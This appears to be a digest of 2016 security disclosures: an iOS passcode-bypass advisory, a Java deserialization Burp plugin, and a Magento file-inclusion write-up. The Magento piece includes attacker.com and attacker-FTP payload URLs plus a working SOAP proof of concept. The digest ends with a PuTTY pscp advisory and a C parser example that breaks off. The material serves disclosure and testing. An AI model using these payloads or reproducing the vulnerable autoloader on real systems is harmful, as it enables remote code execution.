      2016-03-07

      Vulnerability Laboratory ID (VL-ID):
      ====================================
      1778

      Common Vulnerability Scoring System:
      ====================================
      6.4

      Product & Service Introduction:
      ===============================
      iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012, behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by Apple on September 12, 2012, 400 million devices have been sold through June 2012. ( Copy of the Homepage: http://en.wikipedia.org/wiki/IOS )

      Apple Inc. is an American multinational technology company headquartered in Cupertino, California, that designs, develops, and sells consumer electronics, computer software, and online services. Its hardware products include the iPhone smartphone, the iPad tablet computer, the Mac personal computer, the iPod portable media player, and the Apple Watch smartwatch. Apple's consumer software includes the OS X and iOS operating systems, the iTunes media player, the Safari web browser, and the iLife and iWork creativity and productivity suites. Its online services include the iTunes Store, the iOS App Store and Mac App Store, and iCloud. (Copy of the Homepage: https://en.wikipedia.org/wiki/Apple_Inc. )

      Abstract Advisory Information:
      ==============================
      The vulnerability laboratory research team discovered multiple connected passcode protection bypass vulnerabilities in the iOS v9.0, v9.1, v9.2.1 for Apple iPhone (5,5s,6 & 6s) and the iPad (mini,1 & 2).

      Vulnerability Disclosure Timeline:
      ==================================
      2016-01-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
      2016-01-04: Vendor Notification (Apple Product Security Team)
      2016-**-**: Vendor Response/Feedback (Apple Product Security Team)
      2016-**-**: Vendor Fix/Patch (Apple Developer Team)
      2016-**-**: Security Acknowledgements (Apple Product Security Team)
      2016-03-07: Public Disclosure (Vulnerability Laboratory)

      Discovery Status:
      =================
      Published

      Affected Product(s):
      ====================
      Apple
      Product: iOS - (Mobile Operating System) 9.1, 9.2 & 9.2.1

      Exploitation Technique:
      =======================
      Local

      Severity Level:
      ===============
      High

      Technical Details & Description:
      ================================
      An auth passcode bypass vulnerability has been discovered in the iOS v9.0, v9.1, v9.2.1 for Apple iPhone (5,5s,6 & 6s) and the iPad (mini,1 & 2). The vulnerability type allows a local attacker with physical device access to bypass the passcode protection mechanism of the Apple mobile iOS devices.

      The vulnerabilities are located in the 'Appstore', 'Buy more Tones' or 'Weather Channel' links of the Clock, Event Calendar & Siri User Interface. Local attackers can use siri, the event calendar or the available clock module for an internal browser link request to the appstore that is able to bypass the customer's passcode or fingerprint protection mechanism. The attacker can exploit the issue in several ways with siri, the events calendar or the clock app of the control panel on default settings to gain unauthorized access to the affected Apple mobile iOS devices.

      1.1 In the first scenario the attacker requests for example via siri a non existing app, after that siri answers with an appstore link to search for it. Then the attacker opens the link and a restricted browser window is opened and listing some apps. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls is visible in the siri interface only and is called "open App Store". The vulnerability is exploitable in the Apple iPhone 5 & 6(s) with iOS v9.0, v9.1 & v9.2.1

      1.2 In the second scenario the attacker is using the control panel to gain access to the non restricted clock app. The local attacker opens the app via siri or via panel and opens then the timer to the end timer or Radar module. The developers of the app grant apple customers to buy more sounds for alerts and implemented a link. By pushing the link a restricted appstore browser window opens. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the Alert - Tone (Wecker - Ton) & Timer (End/Radar) and is called "Buy more Tones". The vulnerability is exploitable in the Apple iPhone 5 & 6(s) with iOS v9.0, v9.1 & v9.2.1.

      1.3 In the third scenario the attacker opens via panel or by a siri request the clock app. After that he opens the internal world clock module. In the bottom right is a link to the weather channel that redirects to the store as far as it's deactivated. By pushing the link a restricted appstore browser window opens. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the World Clock (Weather Channel) and is an image as link. This special case is limited to the iPad because only those models display the web world map. In the iPhone version the bug does not exist because the map is not displayed because of using a limited template. The vulnerability is exploitable in the Apple iPad2 with iOS v9.0, v9.1 & v9.2.1.

      1.4 In the fourth scenario the attacker opens via siri the 'App & Event Calendar' panel. After that the attacker opens under the Tomorrow task the 'Information of Weather' (Informationen zum Wetter - Weather Channel LLC) link on the left bottom. As far as the weather app is deactivated on the Apple iOS device, a new browser window opens to the appstore. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the App & Events Calendar panel. The vulnerability is exploitable in the Apple iPad2 with iOS v9.0, v9.1 & v9.2.1.

      The security risk of the passcode bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the passcode protection mechanism bypass vulnerability requires no privileged ios device user account or low user interaction. Physical apple device access is required for successful exploitation.
Successful exploitation of the vulnerability results in unauthorized device access, mobile Apple device compromise and leak of sensitive device data like the address-book, photos, sms, mms, emails, phone app, mailbox, phone settings or access to other default/installed mobile apps.

Vulnerable Module(s):
[+] PassCode (Protection Mechanism)

Affected Device(s):
[+] iPhone (Models: 5, 5s, 6 & 6s)
[+] iPad (Models: mini, 1 & 2)

Affected OS Version(s):
[+] iOS v9.0, v9.1 & v9.2.1

Proof of Concept (PoC):
=======================
The passcode protection mechanism bypass vulnerabilities can be exploited by local attackers with physical device access and without privileged or restricted device user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

1.1 Manual steps to reproduce the vulnerability ... (Siri Interface - App Store Link)
iPhone (Models: 5, 5s, 6 & 6s)

1. Take the iOS device and lock the passcode to the front
2. Open Siri by activation via Home button (push 2 seconds)
3. Ask Siri to open a non-existing App
Note: "Open App Digital (Öffne App Digital)
4. Siri responds to the non-existing app and asks to search in the appstore
5. Now, an "open App store" button becomes visible to push (do it!)
6. A new restricted browser window opens with the appstore bottom menu links
7. Click to updates and open the last app or push twice the home button to let the task slide preview appear
8. Now choose the active front screen task
9. Successful reproduce of the passcode protection bypass vulnerability!

1.2 Manual steps to reproduce the vulnerability ... (Clock & Timer - Buy more Tones Link)
iPhone (Models: 5, 5s, 6 & 6s)

1. Take the iOS device and lock the passcode to the front
2. Open Siri by activation via Home button (push 2 seconds)
Note: "Open World Clock" (Öffne App Weltuhr)
3. Push the 'Timer' module button on the bottom
4. Now, push the Radius or End Timer Button in the middle of the screen
Note: A listing opens with the sounds collection and on top is a web link commercial
5. Push the button and a new restricted browser window opens with the appstore bottom menu links
6. Click to updates and open the last app or push twice the home button to let the task slide preview appear
7. Now choose the active front screen task
8. Successful reproduce of the passcode protection bypass vulnerability!

Note: The vulnerability can also be exploited by pushing the same link in the Alerts Timer (Wecker) next to adding a new one.

1.3 Manual steps to reproduce the vulnerability ... (Clock World - Weather Channel Image Link)
iPad (Models: 1 & 2)

1. Take the iOS device and lock the passcode to the front
2. Open Siri by activation via Home button (push 2 seconds)
Note: "Open App Clock" (Öffne App Uhr)
3. Switch in the bottom module menu to world clock
Note: on the bottom right is an image of the weather channel llc network
4. Push the image of the weather channel llc company in the world map picture
Note: Weather app needs to be deactivated by default
5. After pushing the button a new restricted browser window opens with the appstore bottom menu links
6. Click to updates and open the last app or push twice the home button to let the task slide preview appear
7. Now choose the active front screen task
8. Successful reproduce of the passcode protection bypass vulnerability!

Note: The issue is limited to the iPad 1 & 2 because of the extended map template!

1.4 Manual steps to reproduce the vulnerability ... (Events Calendar App - Weather Channel LLC Link)
iPad (Models: 1 & 2) & iPhone (Models: 5, 5s, 6 & 6s)

1. Take the iOS device and lock the passcode to the front
2. Open Siri by activation via Home button (push 2 seconds)
Note: "Open Events/Calendar App" (Öffne Events/Kalender App)
3. Now push on the bottom of the screen next to the Tomorrow (Morgen) module the 'Information of Weather Channel' link
Note: Weather app needs to be deactivated by default
4. After pushing the button a new restricted browser window opens with the appstore bottom menu links
5. Click to updates and open the last app or push twice the home button to let the task slide preview appear
6. Now choose the active front screen task
7. Successful reproduce of the passcode protection bypass vulnerability!

Video Demonstration:
In the attached video demonstration we show how to bypass the passcode of the iPhone 6s via the Siri App Store- & timer Buy more Tones link. In the video we activated the passcode and set up the control center to be activated by default on the locked mobile front screen. Siri was activated as well by default.

Solution - Fix & Patch:
=======================
The vulnerabilities can be temporarily patched by the end user by hardening the device settings. Deactivate in the Settings menu the Siri module permanently. Deactivate also the Events Calendar without passcode to disable the push function of the Weather Channel LLC link. Deactivate in the next step the public control panel with the timer and world clock to disarm exploitation. Activate the weather app settings to prevent the redirect when the module is disabled by default in the events calendar. Finally Apple needs to issue a patch as workaround for the issue but until this happens a temporary solution has been published as well.

Security Risk:
==============
The security risk of the passcode protection mechanism bypass vulnerabilities in the Apple iPad and iPhone mobile devices is estimated as high. (CVSS 6.4)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research () vulnerability-lab com) [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin () vulnerability-lab com - research () vulnerability-lab com - admin () evolution-sec com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research () vulnerability-lab com) to ask for permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com

Source: http://seclists.org/fulldisclosure/2016/Mar/15
  11. Java Deserialization Attacks with Burp

Eric Gruber | March 2, 2016

Introduction

This blog is about Java deserialization and the Java Serial Killer Burp extension. If you want to download the extension and skip past all of this, head to the Github page here.

The recent Java deserialization attack that was discovered has provided a large window of opportunity for penetration testers to gain access to the underlying systems that Java applications communicate with. For the majority of the applications we see, we can simply proxy the connection between the application and the server to view the serialized body of the HTTP request and HTTP response, assuming that HTTP is the protocol that is being used for communication. For this blog, HTTP is going to be assumed and to perform any type of proxying for HTTP, we will use Burp.

Burp Proxy

Here's a simple example of what a Burp proxied HTTP request with a serialized Java object in its body looks like:

In this example we have a serialized object called State that is comprised of two Strings, capitol (spelled wrong in the example) and nicknames. From here, we can manipulate the request by sending it to the Repeater tab.

Generating Serialized Exploits

There are a few tools out there that will generate serialized Java objects that are able to exploit vulnerable software. I'm a big fan of Chris Frohoff's ysoserial (https://github.com/frohoff/ysoserial.git). He has payload generators for nine exploitable software stacks at the time of me writing this. Simply running the jar file with the payload type and command to execute will generate the serialized object for you. Just make sure you output it to a file:

```
java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 'ping netspi.com' > payload
```

We can then copy the serialized output into Burp using the paste from file context menu item:

Which will result in the following:

Generating Serialized Exploits in Burp

Ysoserial works well enough, but I like to optimize my exploitation steps whenever possible. This includes removing the need to go back and forth between the command line and Burp. So I created the Burp extension Java Serial Killer to perform the serialization for me. It essentially is a modified Repeater tab that uses the payload generation from ysoserial.

To use Java Serial Killer, right click on a POST request with a serialized Java object in the body and select the Send to Java Serial Killer item.

A new tab will appear in Burp with the request copied over into a new message editor window.

In the Java Serial Killer tab there are buttons for sending requests, serializing the body, selecting a payload type, and setting the command to run.

For an example, say we want to ping netspi.com using the CommonsCollections1 payload type, because we know it is running Commons-Collections 3.1. We just set the payload in the drop down menu and then type the command we want and press the serialize button. Pressing the little question mark button will also display the payload types and the software versions they are targeting if you need more information.

We now have our command in a serialized object in the request. Pressing the Go button will send the request off and show the response on the right hand side. If you prefer to use Repeater, you can send it to that too.

If you want to try another payload, simply select the new payload and hit serialize again. As Chris Frohoff adds more payloads, I plan to update Java Serial Killer accordingly.

Conclusion

I submitted the plugin to the Burp app store and I don't expect it to take too long to get approved, but if you want to try it out now, you can get it from our Github page (https://github.com/NetSPI/Burp-Extensions/releases). You will need to be running Java 8 for it to work.

Source: https://blog.netspi.com/java-deserialization-attacks-burp/
  12. Heartbleed is the only attack that is simple, "reliable" and useful at the same time. Some details about DROWN here: http://blog.cryptographyengineering.com/2016/03/attack-of-week-drown.html
  13. AuthMatrix for Burp Suite – Web Authorisation Testing Tool

AuthMatrix is a web authorisation testing tool built as an extension to Burp Suite that provides a simple way to test authorisation in web applications and web services. With AuthMatrix, testers focus on thoroughly defining tables of users, roles, and requests for their specific target application upfront. These tables are displayed through the UI in a similar format to that of an access control matrix commonly built in various threat modelling methodologies.

Once the tables have been assembled, testers can use the simple click-to-run interface to efficiently run all combinations of roles and requests. Testers can then confirm their results with an easy to read, color-coded interface indicating any authorisation vulnerabilities detected in the system. Additionally, the extension provides the ability to save and load target configurations for simple regression testing.

Usage

1. Create users that fit these various roles and check all roles that the user belongs to. If a user is part of multiple roles, check each role individually.
2. From another area of Burp Suite (i.e. Target tab, Repeater Tab, etc) right click a request and select "Send to AuthMatrix." This will create a new item in the second table of the interface. Multiple requests can be added all at once by selecting several requests from within the Target tab.
3. In the second table of AuthMatrix, check all roles that are authorised to make each request.
4. Create a regex based on the expected response behavior of the request to determine if the action has succeeded. Common regexes include HTTP Response headers, success messages within the body, or other variations within the body of the page.
5. Generate session tokens for each user via a web browser or the repeater tab and enter them into the correct field within the first table.
6. Click Run to run all requests or right click several messages and select run.
7. Observe that the adjacent table will show color-coded results, red indicating the request did not return expected results and may indicate a vulnerability.

You can download AuthMatrix here: AuthMatrix.py

Or read more here.

Source: http://www.darknet.org.uk/2016/03/authmatrix-for-burp-suite-web-authorisation-testing-tool/
  14. Attacking The XNU Kernel In El Capitan
  15. Hacking Magento eCommerce For Fun And 17.000 USD

Magento, which was acquired by Ebay Inc back in 2011, is one of the most popular e-commerce platforms written in PHP. There is an interesting bug bounty program in place that offers bounties of up to 10,000$ for Information Disclosure and Remote Code Execution vulnerabilities. In November 2014, I decided to give it a try, so I started looking for security bugs in Magento CE, and almost immediately I discovered a PHP Object Injection vulnerability which (un)fortunately requires administrator privileges in order to be exploited. I thought this reason was good enough to choose not to report my finding under their bug bounty program, since Magento administrators should already be able to upload and execute arbitrary code through the administration panel. However, after a couple of weeks a friend of mine encouraged me to submit the finding, because you never know. So I did it, and when I finished writing my report including a PoC, and I was about to send it, I noticed that the bug had already been (silently!) patched only a few days earlier! The researcher who reported the vulnerability has been awarded with 2,500$ for the very same finding…

A couple of months later, in February 2015, there were a lot of rumors about what I consider a very nice piece of research which chains several vulnerabilities in Magento that ultimately allow an unauthenticated attacker to execute arbitrary PHP code on the web server. Getting inspired by these vulnerabilities, I decided to come back to Magento source code looking for new security bugs, and I discovered and reported two vulnerabilities which made me win two bounties I'd never thought I'd receive: 8,000$ and 9,000$.

Both of the vulnerabilities were discovered in February 2015, however I decided to report only a "potential Remote Code Execution" at a first stage, because I thought the other one – a trivial information leakage bug – had a security impact too low in order to be eligible for the bug bounty program, in other words I thought it wasn't a "real" security issue. I was wrong (again!)…

• Autoloaded File Inclusion in SOAP API (CVE-2015-6497)

There is a class of vulnerabilities that might affect certain PHP applications which use an "exploitable" autoloading mechanism. The "Autoloading Classes" feature has been introduced in PHP 5.0 with the magic function __autoload() which is automatically called when your code references a class or interface that hasn't been loaded yet. So, instead of including every needed class by hand, it is possible to register a function that gets called as soon as the code tries to instantiate an unknown class. This function gets passed the unknown class name and is responsible for including the right file that contains the class definition.

While this feature is extremely useful and powerful, it might introduce potential Local/Remote File Inclusion vulnerabilities when user-controlled input is used as a class name. Indeed, if an attacker can control the class name variable passed to an autoloading function, she could try to play around with it in order to include an arbitrary file and execute PHP code remotely. There are multiple ways to trigger the autoloader, the most obvious is class instantiation using the new operator. In addition to that, there are some PHP functions which can be considered a sensitive sink for this class of vulnerabilities. Here is an incomplete list:

class_exists()
interface_exists()
method_exists()
property_exists()
is_subclass_of()
…

So, when user-controlled input (tainted data) enters one of these sensitive sinks there's a chance for the application to be vulnerable to an "Autoloaded File Inclusion" attack. Let's see a simple example of vulnerable code:

```php
/* Some code... */

// Deliberately vulnerable: the class name is used as an include path without validation
function __autoload($class_name)
{
    include $class_name . '.php';
}

if (isset($_GET['class']) && class_exists($_GET['class'])) {
    $myObject = new $_GET['class'];
} else {
    die('No class found');
}

/* Some code... */
```

In this example an attacker controls a class name via the GET parameter "class", which is first used with the class_exists() function (triggering the autoloader in case it is an unknown class) and then to instantiate a new object. This means that the attacker can control the $class_name variable passed to the autoloader, therefore it could be possible to include arbitrary files from both local or remote resources by invoking URLs like these:

http://example.com/vuln.php?class=http://attacker.com/shell
http://example.com/vuln.php?class=../../../tmp/cache/attacker_controlled/file

In the first case the autoloader will try to include and execute the PHP code located at http://attacker.com/shell.php, resulting in a Remote File Inclusion (RFI); while in the second case the autoloader will try to include and execute the PHP code located in the file /tmp/cache/attacker_controlled/file.php, resulting in a Local File Inclusion (LFI). Furthermore, in cases like this where the attacker controls the classname's prefix, in addition to http:// other PHP wrappers might be abused in order to execute arbitrary PHP code.

According to the official PHP documentation "a valid class name starts with a letter or underscore, followed by any number of letters, numbers, or underscores". That means an attacker cannot include arbitrary files via class names because it should not be possible to e.g. use path traversal sequences (../../) through them. But here comes the problem: there was a bug in the PHP core which allowed to invoke class autoloaders with invalid class names.
This bug was solved in January 2014 with the release of PHP versions 5.4.24 and 5.5.8, and that's probably one of the reasons why Magento's security engineers have undervalued this issue.

Magento Vulnerability

The vulnerability in Magento is caused by the code that handles the "catalogProductCreate" SOAP API call. The vulnerable code is located in the /app/code/core/Mage/Catalog/Model/Product/Api/V2.php script:

```php
public function create($type, $set, $sku, $productData, $store = null)
{
    if (!$type || !$set || !$sku) {
        $this->_fault('data_invalid');
    }

    $this->_checkProductTypeExists($type);
    $this->_checkProductAttributeSet($set);

    /** @var $product Mage_Catalog_Model_Product */
    $product = Mage::getModel('catalog/product');

    $product->setStoreId($this->_getStoreId($store))
        ->setAttributeSetId($set)
        ->setTypeId($type)
        ->setSku($sku);

    // $productData is never type-checked before reaching property_exists()
    if (!property_exists($productData, 'stock_data')) {
        //Set default stock_data if not exist in product data
        $_stockData = array('use_config_manage_stock' => 0);
        $product->setStockData($_stockData);
    }
    // ... (the rest of the method is not shown in the original excerpt)
```

This method expects the $productData parameter to be an array (in form of a stdClass object) and uses the property_exists() function with it. However, an attacker can manipulate a SOAP request arbitrarily and send the $productData parameter in form of a string. In this case, if the string passed to the property_exists() function is an unknown class, any registered autoloader function will be triggered. When the property_exists() function is called there's only one autoloader function registered, that is the Varien_Autoload::autoload() method:

```php
public function autoload($class)
{
    if ($this->_collectClasses) {
        $this->_arrLoadedClasses[self::$_scope][] = $class;
    }
    if ($this->_isIncludePathDefined) {
        $classFile = COMPILER_INCLUDE_PATH . DIRECTORY_SEPARATOR . $class;
    } else {
        $classFile = str_replace(' ', DIRECTORY_SEPARATOR, ucwords(str_replace('_', ' ', $class)));
    }
    $classFile .= '.php';
    //echo $classFile;die();
    return include $classFile;
}
```

In such a scenario, the $class parameter automatically passed to this method is exactly the same string value sent through the $productData parameter from the SOAP request, which after some replacements and a ".php" string appended to it, is being used in a call to the include() function. This may result in an arbitrary file inclusion (both from local or remote resources) and could be exploited to include and execute arbitrary PHP code.

There are some conditions which should be met to exploit this vulnerability:

- an API user account with privileges to create a catalog product is required;
- in order to include arbitrary files from remote locations, Magento should run on PHP before 5.4.24 or 5.5.8, because such versions have fixed the issue related to invalid class names in the autoloading process;
- in order to include arbitrary files from remote locations the "allow_url_include" directive must be set to On;
- in case the "allow_url_include" directive is set to Off it might still be possible to include files from remote locations using the ssh2.sftp:// wrapper (which requires the SSH2 extension to be installed) or execute arbitrary OS commands leveraging the expect:// wrapper (which requires the Expect extension to be installed).

NOTE: if Magento is running on PHP version after 5.4.23 or 5.5.7 the vulnerability could still be exploited by including a local file with a .php extension (something like /tmp/test.php). If Magento is running on PHP before 5.3.4 the vulnerability could be exploited to include arbitrary local files with any extension (e.g. a session file containing malicious PHP code injected by the attacker) because NULL bytes are allowed within the path (see CVE-2006-7243).

Proof of Concept

A remote attacker with valid API credentials could send a SOAP request like the following in order to exploit the vulnerability:

```
POST /magento/index.php/api/v2_soap HTTP/1.0
Host: localhost
Content-Length: 804
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Magento" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:catalogProductCreate>
<sessionId xsi:type="xsd:string">VALID_SESSION</sessionId>
<type xsi:type="xsd:string">simple</type>
<set xsi:type="xsd:string">4</set>
<sku xsi:type="xsd:string">test</sku>
<productData xsi:type="xsd:base64Binary">ZnRwOi8vYXR0YWNrZXI6cGFzc3dvcmRAYXR0YWNrZXJfc2VydmVyLmNvbS9ob21lL2F0dGFja2VyL2V2aWw=</productData>
<storeView xsi:nil="true"/>
</ns1:catalogProductCreate>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```

The "productData" parameter has been encoded in base64 within the SOAP request, and the decoded string is the following:

ftp://attacker:password@attacker_server.com/home/attacker/evil

This means that leveraging the ftp:// wrapper, an attacker might be able to force Magento to load and execute malicious code from a FTP server under its control. In this example, the attacker only has to put the malicious code under /home/attacker/evil.php. However, as we said before, other PHP wrappers might be abused, potentially leading to direct arbitrary PHP code execution.

Responsible Disclosure Timeline

As I was saying, I reported this vulnerability in late February 2015, and I received the first reply from the Magento Security Team on June 22, 2015, stating that my submission was not eligible for the bug bounty program, because it was found to be invalid and not actionable.
The reason for the rejection was that there are too many requirements to exploit the vulnerability. First of all, it requires Magento to be running on outdated PHP versions, because this kind of vulnerability has been fixed in the PHP core engine at the beginning of 2014. However, until today there are still many websites out there using such outdated PHP versions. That should be one of the reasons why the Magento Security Team replied on June 24, stating the following:

We were able to confirm your issue. Even though it requires knowing API credentials, it should not be possible to execute such actions. The PHP versions that are additionally vulnerable, while old are still used in popular distributions like RHEL 7.1. We will schedule fixing this issue for our next product release given lower priority. We will inform you regarding possible awards associated with this report.

On August 4, 2015, a bundle of patches (SUPEE-6482), which resolved several security-related issues, including the one I reported in February, was released by the Magento team. On the same day Magento released new versions (Community Edition 1.9.2.1 and Enterprise Edition 1.14.2.1) that include SUPEE-6482 along with other security patches. On August 13 I sent them an email asking whether there was any chance to get a bounty for reporting such a vulnerability. I had to ping them twice more, before getting their reply on August 25:

Hello Egidio,
Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $8,000.

I published KIS-2015-04 on September 11, 2015 and I received my bug bounty on September 21, 2015.

• Information Disclosure in RSS Feed (CVE-2016-2212)

After a while, in late October 2015, I remembered about that information leakage bug I discovered back in February, and I wondered "Why don't try to report this as well? Maybe I'm missing something out and I wrongly believe this isn't a real security issue". Actually I was missing something crucial, the fact that leveraging this vulnerability a remote unauthenticated attacker might be able to download order comments and other order-related information, potentially including Personally Identifiable Information or credit card data… What a bad "AppSec Guy" I am!!

I reported this vulnerability on October 29, 2015, including a Proof of Concept code, and a proposed patch for the vulnerability, which is exactly the same they used to fix the issue. I received a reply from the Magento Security Team on the very same day:

Hello Egidio,
Thank you for your submission. We have logged ticket APPSEC-1171 to track this issue. We will reach out to you once our security engineers have validated this issue. Per the Magento Responsible Disclosure Guidelines, we ask that you do not disclose your finding to the public or to the media while we validate your submission with our security engineers.

After some months of silence, it was a wonderful Sunday afternoon when I noticed that some days earlier, specifically on January 20, 2016, the Magento team released SUPEE-7405 and new Magento versions which include fixes for several security-related issues, including "Information Disclosure in RSS feed – APPSEC-1171". Consequently, I sent them another email asking whether there was any chance to get a bounty for reporting such a vulnerability (again!). I got their reply on February 1, 2016:

Hello Egidio,
Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $9,000.

I received my bug bounty on February 12, 2016 and I published KIS-2016-02 on February 23, 2016. Actually there is a weird coincidence, because that very same day, only a few hours before publishing the advisory on my website, they pushed an update: SUPEE-7405 v1.1 patch bundle. It could be just a coincidence, however I found this very curious… don't you?

Conclusion

Seeing my personal experience with the Magento bug bounty program (and even experiences from other security researchers), it looks like they truly believe in a "security through obscurity" methodology. I'm quite disappointed by the fact they tried to downplay the severity of my vulnerabilities, silently patching them after several months, without letting me know their progress. However, what really disappoints me is that my vulnerabilities seem to be quite critical, especially considering they're the only two classes of security bugs they're willing to pay up to 10,000$ for under their bug bounty program. I had to ping them several times in order to get my bounties, so I believe they tried to "obscure" and under-evaluate my findings not only because of their "security through obscurity" methodology, but probably because they were also hoping I'd never notice their advisories with my name and the vulnerabilities I reported, and never claim my bounties for such findings?

This entry was posted on March 3, 2016

Source: http://karmainsecurity.com/hacking-magento-ecommerce-for-fun-and-17000-usd
16. VuNote

Author: tintinweb@oststrom.com <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563
Version: 0.1
Date: Feb 20th, 2016
Tag: putty pscp client-side post-auth stack buffer overwrite when processing remote file size

Overview

Name: putty
Vendor: sgtatham
References: * http://www.chiark.greenend.org.uk/~sgtatham/putty/ [1]
Version: 0.66 [2]
Latest Version: 0.66
Other Versions: 0.59 [3] (~9 years ago) <= affected <= 0.66
Platform(s): win/nix
Technology: c
Vuln Classes: stack buffer overwrite (CWE-121)
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-2563

Description

quote website [1]
PuTTY is a free implementation of SSH and Telnet for Windows and Unix platforms, along with an xterm terminal emulator. It is written and maintained primarily by Simon Tatham.

Summary

The putty SCP command-line utility (pscp) is missing a bounds check for a stack buffer when processing the SCP-SINK file-size response to a SCP download request. This may allow a malicious server to overwrite the stack buffer within the client application, potentially leading to remote code execution.

PoC attached. Patch attached.

Besides that, two minor issues have been reported in putty packet handling:
- DoS condition in the parsing of SSH-Strings that leads to a nullptr read. (connect putty to poc and type 'x11exploit' to trigger one occurrence of a crash)
- DoS condition in the handling of unrequested forwarded-tcpip channel open requests that leads to a nullptr read. (connect putty to poc and type 'forwardedtcpipcrash' to trigger crash)

Link: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563
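The following C parser is an added illustration and is neither putty's code nor the PoC from the advisory. It shows the shape of the missing check: in the scp "sink" direction the remote server announces each file with a control line of the form `C<mode> <size> <name>`, and every field on that line is attacker-controlled, so each must be length-checked before it is copied into a fixed-size stack buffer. The field limits, the simplified line grammar (directory lines, timestamps and names containing spaces are not handled) and all function names are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

/* Illustrative reconstruction of the scp sink control line "C<mode> <size> <name>\n".
 * Field limits and names are assumptions for this example, not putty's. */
#define SCP_SIZE_FIELD_MAX 20   /* enough for any 64-bit decimal value */
#define SCP_NAME_MAX       256

struct scp_sink {
    unsigned int       mode;   /* permission bits announced by the server (octal) */
    unsigned long long size;   /* file length announced by the server */
    char               name[SCP_NAME_MAX];
};

/* Copy one field into a fixed buffer, refusing anything that would not fit.
 * This is the bounds check the advisory says was missing: the unchecked form
 * is `while (*p != ' ') buf[i++] = *p++;` on a stack array. With stop_at_space
 * set the field ends at the next space, otherwise it runs to end of line. */
static int copy_field(const char **cursor, char *dst, size_t cap, int stop_at_space)
{
    const char *p = *cursor;
    size_t n = 0;
    while (*p != '\0' && *p != '\n' && !(stop_at_space && *p == ' ')) {
        if (n + 1 >= cap)              /* leave room for the terminator */
            return -1;
        dst[n++] = *p++;
    }
    dst[n] = '\0';
    *cursor = p;
    return n == 0 ? -1 : 0;            /* an empty field is a protocol error */
}

/* Returns 0 and fills *out on success, -1 on any malformed or oversized field. */
int scp_parse_sink_line(const char *line, struct scp_sink *out)
{
    char modebuf[8], sizebuf[SCP_SIZE_FIELD_MAX + 1];
    const char *p = line;
    char *end;

    if (line == NULL || out == NULL || *p != 'C')
        return -1;
    p++;
    if (copy_field(&p, modebuf, sizeof modebuf, 1) < 0 || *p != ' ')
        return -1;
    p++;
    if (copy_field(&p, sizebuf, sizeof sizebuf, 1) < 0 || *p != ' ')
        return -1;
    p++;
    if (copy_field(&p, out->name, sizeof out->name, 0) < 0)
        return -1;

    /* size must be all digits: strtoull alone would accept "-1" or " 0x10" */
    for (const char *q = sizebuf; *q; q++)
        if (*q < '0' || *q > '9')
            return -1;
    errno = 0;
    out->size = strtoull(sizebuf, &end, 10);
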